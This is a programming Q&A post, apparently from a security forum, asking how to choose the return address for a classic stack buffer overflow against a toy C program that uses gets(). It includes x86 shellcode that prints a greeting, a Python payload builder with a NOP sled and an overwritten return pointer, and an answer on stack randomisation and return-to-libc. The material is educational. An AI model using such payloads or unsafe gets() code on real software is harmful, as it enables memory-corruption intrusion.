# Buffer overflow assistance

Tags: c, buffer-overflow, exploit

I'm looking for some help to wrap my head around the following:

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{char buffer[70];
gets(buffer);}
```

I know this is vulnerable to a buffer overflow. It takes 92 "A"s and then the next 4 characters overwrite eip. I have a shellcode I found that simply prints 'hello world' and that's all I really need this to do.

```
"\xe9\x1e\x00\x00\x00"
"\xb8\x04\x00\x00\x00"
"\xbb\x01\x00\x00\x00"
"\x59"
"\xba\x0f\x00\x00\x00"
"\xcd\x80"
"\xb8\x01\x00\x00\x00"
"\xbb\x00\x00\x00\x00"
"\xcd\x80"
"\xe8\xdd\xff\xff\xff"
"\x48\x65\x6c\x6c\x6f\x2c\x20\x57"
"\x6f\x72\x6c\x64\x21\x0d\x0a"
```

So that leaves me 37 bytes for the NOP sled and any padding.

(32 nop + 55 shell + 5 "A"s + 4 pointer) = 96

The problem I'm having is getting the address for the pointer.  I can't seem to wrap my head around how that part works out.

If I'm wrong with any of my thinking, please let me know and any assistance would be appreciated.

Here is the Python I have for it so far:

```
shell="\xe9\x1e\x00\x00\x00\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\x59\xba\x0f\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x54\x69\x67\x65\x72\x21\x0d\x0a"
nop = "\x90"*32
padding = "A"*(92 - 32 - 55) 
pointer = '\x48\xea\x90\xbf'

print nop + shell + padding + pointer
```

Answer (score 1):

Unless you have some way of finding out the right offset (another vulnerability), you won't know the right value. Stack is slightly randomised by default and it will be even worse with PAX.

You can always do it many times with a potential address and hope for the best. Alternatively if you can find the right instructions somewhere in the loaded libraries and the binary is not compiled with PIE, you could try jumping to libc instead.